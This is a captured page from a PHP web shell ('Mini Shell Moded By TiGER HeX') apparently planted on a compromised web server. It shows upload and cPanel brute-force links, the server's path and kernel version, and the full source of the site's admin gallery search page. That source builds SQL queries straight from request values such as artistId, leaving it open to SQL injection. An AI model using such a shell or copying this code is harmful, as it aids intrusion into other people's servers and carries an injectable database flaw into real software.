Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
50mmla
/
admin
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/50mmla/admin/gallerySearch.php
<? include_once('../includes/static/configure.php'); include_once('../includes/static/util.php'); include_once('../includes/static/dbcon.php'); include_once('../includes/static/gdimg.php'); include_once('../includes/static/sessions.php'); include_once('includes/static/util.php'); include_once('includes/appTop.php'); $page_id = str_replace(".php","",basename($_SERVER['PHP_SELF'])); if(!has_permission($page_id)){ die("You don't have permission to view this page!"); } include_once('includes/header.php'); $artist_id = 0; if(isset($_REQUEST['artistId'])){ $artist_id = $_REQUEST['artistId']; } $delete = false; if( isset($_REQUEST['delete']) ){ while(list($key,$value) = each($_REQUEST)){ if (preg_match("/gallery_/i",$key)){ $ids = explode("_",$key); $sql = "DELETE FROM 50mm_gallery WHERE gallery_id = '".$ids[1]."'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } } } $delete = true; echo "<div class=\"hilite\">operation successful</div>"; } ?> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td nowrap width="200"> <form method="POST" action="<?echo $_SERVER['PHP_SELF']?>" enctype="multipart/form-data"> Search By Artist:<br> <?//make drop down menu $sql = "SELECT artist_name,artist_id FROM 50mm_artists WHERE approved = 1 ORDER BY artist_name ASC;"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $options = '<select name="artistId">'."\n"; $options.= '<option value="">-- select artist --</option>'."\n"; $options.= '<option value="0">Anonymous</option>'."\n"; while($row2 = $db->sql_fetchrow($result)){ $options.= '<option value="'.$row2['artist_id'].'">'.$row2['artist_name'].'</option>'."\n"; } $options.= '</select>'."\n"; echo $options; ?> <br><br> <input type="submit" class="button" value="search" name="search"> </form> </td> </tr> </table> <form action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data"> <? $html = ""; $display_table = false; if(isset($_REQUEST['search'])||($delete)){ $display_table = true; } if($display_table){ echo "<a href=\"galleryAdd.php?artistId=".$artist_id."\">add a flick for this artist</a><br><br>"; $sql = "SELECT artist_name FROM 50mm_artists WHERE artist_id = '".$artist_id."'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); if($_REQUEST['artistId'] == 0){ echo "Search results for Anonymous"; }else{ echo "Search results for ".$row['artist_name']; } $gallery_array = Array(); $sql = "SELECT g.gallery_id,g.image,g.entry_time FROM 50mm_gallery g WHERE g.artist_id = '".$artist_id."' AND g.approved = 1"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } while($row = $db->sql_fetchrow($result)){ $row['type'] = "primary"; array_push($gallery_array,$row); } $sql = "SELECT g.gallery_id,g.image,g.entry_time FROM 50mm_gallery g, 50mm_other_artists o WHERE g.approved = 1 AND o.artist_id ='$artist_id' AND g.gallery_id = o.gallery_id"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } while($row = $db->sql_fetchrow($result)){ $row['type'] = "other"; array_push($gallery_array,$row); } $modrows = Array(); while(list($key,$row) = each($gallery_array)){ $id = $row['gallery_id']; $unix = get_unix_time($row['entry_time']); $row['entry_time'] = date("m.j.y",$unix); $image_info = @getimagesize(ROOT_DIR.GALLERY_LIMG_DIR.$row['image']); $js = "popImage('".urlencode(GALLERY_LIMG_DIR.$row['image'])."','".$image_info[0]."','".$image_info[1]."');"; $row['image'] ="<img src=\"".GALLERY_SIMG_DIR.$row['image']."\" border=\"0\" style=\"cursor:pointer;\" onClick=\"".$js."\">"; $xtras = Array(); if(has_permission("galleryEdit")){ $xtras['edit'] = "<a href=\"galleryEdit.php?galleryId=$id\">edit</a>"; } if(has_permission("galleryDelete")){ $xtras['delete'] = "<input type=\"checkbox\" name=\"gallery_".$id."\" value=\"\">"; } $all = array_merge($row,$xtras); array_push($modrows, $all); } echo(get_table($modrows)); } if(has_permission("galleryDelete")){ // $submit = "<input type=\"checkbox\" name=\"selectAll\" onClick=\"return checkUncheckAll(this.form);\"> Select/Deselect All<br>\n"; $submit.= "<input class=\"button\" type=\"submit\" name=\"delete\" value=\"Delete Selected\" onClick=\"return validateDelete(this.form);\">"; echo $submit; } ?> <input type="hidden" name="artistId" value="<?echo $artist_id?>"> </form> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>